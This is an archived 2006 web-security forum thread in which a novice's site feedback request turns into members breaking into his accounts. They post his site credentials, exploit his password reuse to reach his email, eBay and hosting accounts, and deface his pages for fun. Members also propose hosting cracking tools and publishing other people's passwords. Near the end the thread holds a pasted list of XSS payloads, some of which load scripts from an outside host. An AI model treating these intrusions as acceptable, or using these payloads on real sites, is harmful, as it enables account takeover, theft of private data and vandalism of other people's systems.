View Full Version : My Site
trinoid
11-21-2006, 01:16 AM
Hello I am a noob web designer just looking for some feedback thought this was a good fourm so plz check it out and POST BACK :cool:
http://www.z-zap.com
trinoid
11-21-2006, 01:33 AM
NO POSTS AHHH well w/e just have to wait
Moonbat
11-21-2006, 08:53 AM
It's not a security vulnerability, but there's no way you can make a login page without using a server side language like PHP or ASP. Your member login page is currently .html.
Ezekiel
11-21-2006, 01:35 PM
Hello I am a noob web designer just looking for some feedback thought this was a good fourm so plz check it out and POST BACK :cool:
http://www.z-zap.com
Comments:
Flash is not intended for website layout; especially not navigation bars - it is for animations and interactive applications. I block all flash from loading. If you expect people to browse your pages, design them with as little flash as possible.
It looks like you made your site using an automated program or template. Doing so doesn't constitute web design.
People visit websites for content - for example, this forum has information, tools, and a forum. Phrases like "under construction" remind me of the freewebs/geocities era, where websites have nothing but a contact page. You have to ask yourself, why would they contact you? You haven't done anything for them. It comes down to this: create a website after you already know what its purpose is. The UFO also comes under the 'pointless' category.
Sponsors is spelled sponsors, not sponsers.
Sorry if that sounded over-critical, but if nobody corrects you, you will never improve.
It's not a security vulnerability, but there's no way you can make a login page without using a server side language like PHP or ASP. Your member login page is currently .html.
You can make a login page in any language - all it has to do is show a form and direct the user to the login script when they click submit. However, the login script must be in a server-side language.
~~smart~fool~~
11-21-2006, 04:12 PM
well, besides what mike said, cough, its pretty good
Moonbat
11-21-2006, 05:18 PM
Either way, he needs to know about PHP (or any other server side language) so he can make a login page/script/whatever.
trinoid
11-21-2006, 07:04 PM
Comments:
Flash is not intended for website layout; especially not navigation bars - it is for animations and interactive applications. I block all flash from loading. If you expect people to browse your pages, design them with as little flash as possible.
It looks like you made your site using an automated program or template. Doing so doesn't constitute web design.
People visit websites for content - for example, this forum has information, tools, and a forum. Phrases like "under construction" remind me of the freewebs/geocities era, where websites have nothing but a contact page. You have to ask yourself, why would they contact you? You haven't done anything for them. It comes down to this: create a website after you already know what its purpose is. The UFO also comes under the 'pointless' category.
Sponsors is spelled sponsors, not sponsers.
Sorry if that sounded over-critical, but if nobody corrects you, you will never improve.
You can make a login page in any language - all it has to do is show a form and direct the user to the login script when they click submit. However, the login script must be in a server-side language.
well your right most login pages are not made in flash and tru i did spell some things wrong but it isnt a template i made all that myself. and by the way where my site is hosted they dont allow a loit of PHP scripts. even tho i dont know php i have tried to learn but couldnt use MySql and part of the reason i started using this forum was to get help with that and some feedback and by the way that you for the feedback.
nozf3r4tu
11-21-2006, 07:40 PM
Think of something that will give you a lot of traffic to your website.I think if you get cracking tools,password lists and stuff like that for hotmail,yahoo.photobucket or myspace you'll have tons of desperate souls wondering around your site. Just my 2 cents....lol
trinoid
11-21-2006, 07:51 PM
Thats a good idea but im too noob to get those things myself so any ideas on that i mean ya i was thinking of maybee making some prank programs in VB.net like sumtin that like pretends to wipe harddrives or sumtin just to ammuse ppl before i can get some good stuff up there like cracking tools,password lists and more!:cool: so unless i get some helop ya
trinoid
11-26-2006, 03:39 AM
Hello people i am starting to learn Javascript so i dicided to redo my site so plz take anoter look at it.
Troll
11-26-2006, 11:59 AM
I still can't see the point of your site. Can you please tell me it's purpose? :confused:
Moonbat
11-26-2006, 02:08 PM
I just got access to all the usernames/passwords for your site - all 4 of them, lol.
Check your private messages, I pm'ed you all of them.
NEVER EVER make a login script/page/whatever without using a server side language like PHP or ASP. It is very insecure.
Ezekiel
11-26-2006, 06:25 PM
I just got access to all the usernames/passwords for your site - all 4 of them, lol.
Check your private messages, I pm'ed you all of them.
NEVER EVER make a login script/page/whatever without using a server side language like PHP or ASP. It is very insecure.
Anyone who designs a login mechanism around Javascript deserves to lose their data.
Here are the usernames and passwords (the members page contains nothing though):
Username: bango20*
Password: puppies
Username: cryptosparrow
Password: dragon*4
Username: zackymcharvest
Password: dos
Username: kristen
Password: monkey
Troll
11-26-2006, 07:14 PM
Even i found all the usernames and passwords, and i'm useless...
http://z-zap.com/login.js
Moonbat
11-26-2006, 09:49 PM
mike, You didn't have to post them you know, but since the member login area doesn't really contain anything, I guess it's alright.
Also, you can go to z-zap and go to /members.html and see all the member content without having to even use any of that login information.
EDIT: Mike, did you do that to his site? That's mean..
How did you do that anyway?
trinoid
11-27-2006, 12:58 AM
Nice job lol didnt expect for anyone to try and hack it lol just using it for my friends hoping to expand later but ya i tryed to learn PHP still trying i used a editor but failed because i couldnt use mysql if someone could helo me it would b much apprichated. thank you
Ezekiel
11-27-2006, 04:09 AM
mike, You didn't have to post them you know, but since the member login area doesn't really contain anything, I guess it's alright.
Also, you can go to z-zap and go to /members.html and see all the member content without having to even use any of that login information.
EDIT: Mike, did you do that to his site? That's mean..
How did you do that anyway?
Did I do what to his site?
Troll
11-27-2006, 11:55 AM
Did I do what to his site?
Somebody hacked it. They changed the logo so it read "Z-Crap.com", had a scrolling marquee that read "If i used PHP my site wouldn't have been hacked", and, (for some odd reason), there was a picture of a troll :p
i tryed to learn PHP still trying i used a editor but failed
Freewebs don't allow any PHP, so you'll need to find another host.
Ezekiel
11-27-2006, 12:08 PM
Somebody hacked it. They changed the logo so it read "Z-Crap.com", had a scrolling marquee that read "If i used PHP my site wouldn't have been hacked", and, (for some odd reason), there was a picture of a troll :p
Freewebs don't allow any PHP, so you'll need to find another host.
Haha, z-crap... Well, his ftp password was probably the same as the members login password, so whoever did this wasn't so great.
Moonbat
11-27-2006, 06:21 PM
there was a picture of a troll
If I didn't know any better....
Moonbat
11-27-2006, 06:23 PM
You guys know bango20*? So happens he has a freewebs site too, with the same password.
Troll
11-27-2006, 06:33 PM
Bango20* is trinoid.
He also uses the same password for everything, i checked :p
I guess that's how someone hacked his site. They must of done a whois on the domain z-zap.com, signed into the email account which is contained in the whois information, got freewebs to send his password and username via email, signed into his freeweb account for z-zap.com then changed a few things..
I still wonder why there was a picture of a troll on his site though :p
I s***est trinoid changes his passwords, and don't use the same password for everything.
Moonbat
11-27-2006, 07:05 PM
Well, I did some redecorating on his freewebs page www.freewebs.com/bango20*
What? I couldn't resist it:D
Troll, don't act like you don't know why a troll pic is was on his site.:D
trinoid
11-27-2006, 07:10 PM
yas i know freewebs doesnt allow PHP but i havr a yeatr subscriotion for it so ya i dont know of any free servers i can use and neways i dont know how to use mysql
Moonbat
11-27-2006, 07:17 PM
Well Brad Wilehm You can go to here to learn some SQL
http://www.w*schools.com/sql/default.asp
BTW, is Blu your gf?
Troll
11-27-2006, 07:46 PM
hehe.. nice work Moonbat :p
We are cruel...
trinoid got pwned!!! Got anymore websites we can play around with?
Brad, look at this (http://www.freevirtualservers.com/free-hosting.htm).. they offer free hosting which allows PHP.
Moonbat
11-27-2006, 08:15 PM
You don't learn do you Brad.
Go back to z-zap people.
Troll
11-27-2006, 08:37 PM
Btw...
People are still sending my their myspace passwords. I have almost *5 different ones now...
Maybe i should publish the list here? :p
Moonbat
11-27-2006, 09:00 PM
They deserve it, after all, if you had been telling the truth, they would have used that fake method to hack others.
Troll
11-27-2006, 09:07 PM
Good point,
They are willing to hack other people's accounts, therefore it's fair to publish their passwords...
It will also teach them some lessons..
I'll publish the list tomorrow, it's *am here and i need some sleep..
trinoid
11-27-2006, 09:24 PM
lol nice well now what passwords do i need to change what ones do ya know?:confused:
Troll
11-27-2006, 09:27 PM
what passwords do i need to change
Change them all.
trinoid
11-27-2006, 09:31 PM
ok i will but you know that free server site that someone posted well ty but it is not supported for free in the US so can somebody help me find a goodone that allows PHP
tocksarcle
11-27-2006, 10:37 PM
ok i will but you know that free server site that someone posted well ty but it is not supported for free in the US so can somebody help me find a goodone that allows PHP
I use http://www.awardspace.com because they have good PHP hosting and MySQL databases.
trinoid
11-27-2006, 11:00 PM
i got a host YAY but now i need a PHP editor can anyone help me where is a good free one:D :confused:
trinoid
11-27-2006, 11:04 PM
still cant find a editor but ya i made this ha im starting to learn with the two most used words in programming http://bango20*.t*5.com/helloworld.php
Moonbat
11-27-2006, 11:15 PM
For (insert religious deity here)'s sake, learn some security man! I just h4x0r*d your new PHP site.
You can see the same message on your site.
EDIT: Did you shut down z-zap.com? I tried going to it now, which took me to OpenDNS and said that your site doesn't resolve
Troll
11-27-2006, 11:33 PM
I've added my own little message on his site too :)
Moonbat
11-27-2006, 11:35 PM
Lol, this is the most fun directly/indirectly relating to this site. Thank you all for giving me something to do besides answer questions from never-gonna-be-hackers. But I gotta hit the sack (go to sleep for all you forenigers) so I'll be getting off now. Good night!
Troll
11-28-2006, 02:26 AM
http://bango20*.t*5.com/
Change all your passwords.
http://bango20*.t*5.com/index*.php It didn't take long.
Troll
11-28-2006, 03:57 AM
It seems you've finally taken our advice and changed your passwords. (Or someone else has changed them for you)
Well done. I hope you liked the improvement i made on http://bango20*.t*5.com/ 's homepage.
EDIT:
Hello Moonbat && troll I changed my passwords I dont think that you will be able to figure this one out. I have only used it for one thing before so good luck trying to get into this site now lol
Is that a challenge?
Troll
11-28-2006, 04:55 AM
I hope it was a challenge because i just hacked your site again...
Ask me if you want your new passwords.. your T*5.com password is still 2**00**0***6
Ezekiel
11-28-2006, 01:13 PM
I think you've all proven now that you can enter passwords into a text box when they are straight up given to you.
still cant find a editor but ya i made this ha im starting to learn with the two most used words in programming http://bango20*.t*5.com/helloworld.php
Try notepad, or any text editor.
Troll
11-28-2006, 01:16 PM
Couldn't you all have spent this time doing something useful...
Like what?
Ezekiel
11-28-2006, 01:18 PM
Like what?
I don't know, but my point is this thread became pointless after about the 5th hack.
Moonbat
11-28-2006, 07:10 PM
Well, there's nothing better to do on this site besides answer stupid questions/hack requests and expose lame scammers.
trinoid
11-28-2006, 07:44 PM
and plus they are really helping me upgrade my security even tho they may not kno it and :eek: im still str***ling with tis PHP script can u tell me whats wrong
<?php
/**
*
*
* @version $Id$
* @copyright 2006
*/
$password = 'letmein';
if ($password == $_post['pass']) {
print 'logged in';
}else{
print <<<_html_
<form method="post" action=" $_server[PHP_SELF] ">
<input type="text" value="password" name="pass">
<input type="submit" Value="LOGIN">
</form>
_html_;
}
?>
ty
Moonbat
11-28-2006, 08:34 PM
Instead of using
<form method="post" action=" $_server[PHP_SELF] ">
I think action should be changed to the name of your php page that validates input, like
<form method="post" action="login.php">
trinoid
11-28-2006, 08:41 PM
THANKS ill try it
trinoid
11-28-2006, 08:43 PM
all it did was say login.php when i tried it in my editor should i upload it and try??
trinoid
11-28-2006, 08:56 PM
IT Didnt work OMG lol im confused thats what me book said to do
Troll
11-28-2006, 09:10 PM
Location: Find out and I'll give you $*00
Really? Are you sure?
Moonbat
11-28-2006, 09:16 PM
trinoid, if you didn't upload your login.php (or whatever your login page is called) to the same directory as the page where the person logs in, then it worn't work. You could just write it full like this
action="http://www.yoursite.com/login.php">
@Troll, I'm talking about exact address, not just my location. You can easily find out what city I'm in.
trinoid
11-28-2006, 09:19 PM
i got it to work i just had to make some things varriables so ya and i have a good editor now i like it:D
Troll
11-28-2006, 09:23 PM
I'm talking about exact address, not just my location. You can easily find out what city I'm in.
Oh ok...
i got it to work i just had to make some things varriables so ya and i have a good editor now i like it
I can't wait to hac... i mean, test the security of your website.
trinoid
11-28-2006, 09:27 PM
lol im not useing that for a password entry thing its just for testing but ya let me change the password then u can try and oh ya dont cheat by looking at it by loggin into my t*5 account
Troll
11-28-2006, 09:32 PM
dont cheat by looking at it by loggin into my t*5 account
Anyone reading this will have the same information as me, therefore if i can log into your t*5 account anybody can.
All hackers cheat.. you need to make your site *00% secure so nobody (including me and moonbat) can hack it
trinoid
11-28-2006, 09:35 PM
well i dont know how you got my new password i just dont
Troll
11-28-2006, 09:40 PM
It's difficult to explain, (or i'm rubbish at explaining things)...
You use the same password for everything, so i only had to find out the new password for one thing (your gmail account) then i can access everything.
trinoid
11-28-2006, 09:41 PM
oh ok ic then im gunna go change all my passwords once more
starting with my gmail this time!
:cool:
trinoid
11-28-2006, 09:43 PM
WHATS MY GMAIL PASSWORD PLZ:confused:
Troll
11-28-2006, 09:43 PM
Try using different passwords for different accounts etc..
Troll
11-28-2006, 09:44 PM
It's Trollsrule .... or Trollrules ... i can't remember :p
trinoid
11-28-2006, 09:53 PM
ok i changed my gmail password to the most random thing ever lols:eek:
Troll
11-28-2006, 09:55 PM
i bet you'll forget it in the future
trinoid
11-28-2006, 09:57 PM
nope it has significant value to me and only me:D
Troll
11-28-2006, 10:03 PM
I'm sorry brad, try logging in to your gmail account again.
Moonbat
11-28-2006, 10:03 PM
trinoid, you forgot to change your passowrd to bnainc(@)**********
You also missed changing your ebay account, and you still didn't fix z-zap.com
trinoid
11-28-2006, 10:06 PM
HOW OMG HOW HOW HWO HOW!!!!!!!! lol tell me what i need to do
Moonbat
11-28-2006, 10:14 PM
I got into your bradleywilhelm account again.
trinoid
11-28-2006, 10:19 PM
Can You Please Tell Me What I Need To Do To Make It Secure
Moonbat
11-28-2006, 10:23 PM
I'll pm you what to do.
Troll
11-28-2006, 10:27 PM
*Troll quickly changes all of brad's passwords*
Just kidding :p
trinoid
11-28-2006, 10:28 PM
lol ya funny that would rly suck
Moonbat
11-28-2006, 10:29 PM
Did you get my message trinoid?
Troll
11-28-2006, 10:31 PM
If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.
Moonbat
11-28-2006, 10:32 PM
He had his PayPal account's password diferent from the begining.
Troll
11-28-2006, 10:34 PM
Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"
Moonbat
11-28-2006, 10:37 PM
Finally trinoid changed his gmail passwords!
trinoid
11-28-2006, 10:38 PM
ya i did changed both passwords and working on the rest
Troll
11-28-2006, 10:38 PM
Yipeeeee!!
Moonbat
11-28-2006, 10:39 PM
Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savy.
Troll
11-28-2006, 10:41 PM
I hope it's the end :p
Moonbat
11-28-2006, 10:42 PM
I'm bored, now what'll we do?
Troll
11-28-2006, 10:44 PM
I'm bored too...
Brad- change all your passwords back
trinoid
11-28-2006, 10:44 PM
thank you very much
trinoid
11-28-2006, 10:46 PM
ok ok i think that im done nope i need to change one or two more but ty guys this has been fun and i hope that maybee we can be friends and not just you guys like attacking my site lol well ya ok im gunna go finish:D ill post back on this thread
Moonbat
11-28-2006, 10:49 PM
Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
Yet again
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>
Differnet encodings: should output alert(xss) or whatever
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6:�*7�*08�*0*�**4�**6(�**X**�***>
<IMG SRC=j*v***r*pt&#x*A*lert('X**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>
trinoid
11-28-2006, 10:55 PM
what is that?
Moonbat
11-28-2006, 10:58 PM
It can let you run JavaScript commands on a website as if they were coming from the server.
trinoid
11-28-2006, 11:15 PM
oh cool so thats how you inject it huh like <img src="javascript:alert("LIKE THIS?")">
trinoid
11-28-2006, 11:16 PM
<img src='javascript:alert("HELLO")'>
Moonbat
11-28-2006, 11:17 PM
Yeah, but these forums aren't vulnerable
Put this in your web browser's address bar
javascript:alert("Hello");
A popup shoudl come up saying Hello. Injections can use any javascript code, it just has to be sytaxed a little differently.
trinoid
11-28-2006, 11:25 PM
oh ok ya i nkow a lol bit of java lol thats how u got my password
trinoid
11-29-2006, 03:17 AM
Good nIght guys :rolleyes:
Ezekiel
11-29-2006, 01:24 PM
Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
Yet again
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>
Differnet encodings: should output alert(xss) or whatever
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6:�*7�*08�*0*�**4�**6(�**X**�***>
<IMG SRC=j*v***r*pt&#x*A*lert('X**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>
I'm sure I explained about this before.
The vulnerability I found was in the search box of this website (the box in the top right of the page, next to 'latest news'), and is part of the actual website.
The vBulletin forum we are posting in now has not been coded by the makers of this website, and has no relation to a bug in the website's programming. In other words, there is a vulnerability in this website's search box, but not the forum. vBulletin is a professional forum package and is mostly free of bugs. When hundreds of thousands of people rely on it for discussions, it has a certain responsibility to protect its users. Searching for vulnerabilities in forums is totally pointless.
Forum = created by vBulletin staff.
All-nettools.com = created by all-nettools.com staff.
If a member of all-nettools staff creates a programming error, the forum remains unchanged because he didn't create the forum.
It can let you run JavaScript commands on a website as if they were coming from the server.
XSS vulnerabilities allow you to send users custom content when they request a page. The vulnerabilities allow you to inject code into a user's page. They are client-side, and have no impact on the server itself.
Moonbat
11-29-2006, 05:13 PM
Ah, well, I got that definition from another site anyway.
I know you told me about this before, I just wanted to keep trying. If everyone assumed everything was secure, and didn't try to find a hole in the security, hacking would cease to exist.
Powered by vBulletin® Version 4.1.8 Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.